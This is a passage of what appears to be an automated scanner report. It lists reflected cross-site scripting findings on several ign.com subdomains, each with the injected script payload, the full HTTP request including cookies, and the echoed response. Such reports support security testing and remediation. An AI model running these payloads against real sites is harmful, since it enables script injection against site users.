1.101. http://cheats.ign.com/ob2/068/077/077723.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/077/077723.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff970"><script>alert(1)</script>75476dfe71e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ob2/068/077/077723.html?ff970"><script>alert(1)</script>75476dfe71e=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:59 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 104169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/ob2/068/077/077723.html?ff970"><script>alert(1)</script>75476dfe71e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.102. http://cheats.ign.com/ob2/068/142/14235018.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/142/14235018.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 801b0"-alert(1)-"e0bf0ad5652 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ob2/068/142/14235018.html?801b0"-alert(1)-"e0bf0ad5652=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:08 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 120521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
scoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/ob2/068/142/14235018.html?801b0"-alert(1)-"e0bf0ad5652=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.103. http://cheats.ign.com/ob2/068/142/14235018.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/142/14235018.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25be8"><script>alert(1)</script>f1c064d66f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ob2/068/142/14235018.html?25be8"><script>alert(1)</script>f1c064d66f3=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:05 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 120600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/ob2/068/142/14235018.html?25be8"><script>alert(1)</script>f1c064d66f3=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.104. http://cheats.ign.com/sendcheats.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /sendcheats.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c92f"-alert(1)-"8c3aa49fd93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sendcheats.html?9c92f"-alert(1)-"8c3aa49fd93=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:55 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 78118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Send Cheats</title
...[SNIP]...
ypeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/sendcheats.html?9c92f"-alert(1)-"8c3aa49fd93=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.105. http://cheats.ign.com/sendcheats.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /sendcheats.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be516"><script>alert(1)</script>130f141382a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sendcheats.html?be516"><script>alert(1)</script>130f141382a=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:53 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 78164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Send Cheats</title
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/sendcheats.html?be516"><script>alert(1)</script>130f141382a=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.106. http://club.ign.com/b/api/objects/user.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://club.ign.com
Path:   /b/api/objects/user.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 3abb4<script>alert(1)</script>6da74b2156f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/api/objects/user.js?callback=?3abb4<script>alert(1)</script>6da74b2156f HTTP/1.1
Host: club.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:15 GMT
Content-Type: application/x-javascript
Set-Cookie: NSC_vtfsqbhft_iuuq_wjq=ffffffff0909737b45525d5f4f58455e445a4a423660;path=/;httponly
Content-Length: 94

?3abb4<script>alert(1)</script>6da74b2156f({"message":"objects not found for logged in user"})

1.107. http://comics.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b97e"-alert(1)-"d8da5fb0758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?9b97e"-alert(1)-"d8da5fb0758=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:42 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-14395-411846107-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:12:42 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041162862v-1n-12mc+1297041162862mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 144690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/?9b97e"-alert(1)-"d8da5fb0758=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.108. http://comics.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24e1c"><script>alert(1)</script>7a3764f3771 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?24e1c"><script>alert(1)</script>7a3764f3771=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:39 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-24874-1276965940-9;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:12:39 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041159959v-1n-12mc+1297041159959mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 144777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/?24e1c"><script>alert(1)</script>7a3764f3771=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.109. http://comics.ign.com/articles/113/1136508p1.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /articles/113/1136508p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53c59"-alert(1)-"e80a33c5c90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/113/1136508p1.html?53c59"-alert(1)-"e80a33c5c90=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:38 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15002-1104835483-8;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:38 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041219032v-1n-12mc+1297041219032mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 109817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
oreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://comics.ign.com/articles/113/1136508p1.html?53c59"-alert(1)-"e80a33c5c90=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.110. http://comics.ign.com/articles/113/1136508p1.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /articles/113/1136508p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39411"><script>alert(1)</script>24e9a9f553c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/113/1136508p1.html?39411"><script>alert(1)</script>24e9a9f553c=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:33 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22329-1386714246-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:33 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041213610v-1n-12mc+1297041213610mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 117539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/articles/113/1136508p1.html?39411"><script>alert(1)</script>24e9a9f553c=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.111. http://comics.ign.com/index/characters.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/characters.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e150"><script>alert(1)</script>acaf8d67148 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/characters.html?6e150"><script>alert(1)</script>acaf8d67148=1 HTTP/1.1
Host: comics.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:28 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18145-1388692171-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:13:28 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041208382v-1n-12mc+1297041208382mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 135696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Comics: Review
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://comics.ign.com/index/characters.html?6e150"><script>alert(1)</script>acaf8d67148=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.112. http://comics.ign.com/index/characters.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://comics.ign.com
Path:   /index/characters.html

Issue detail

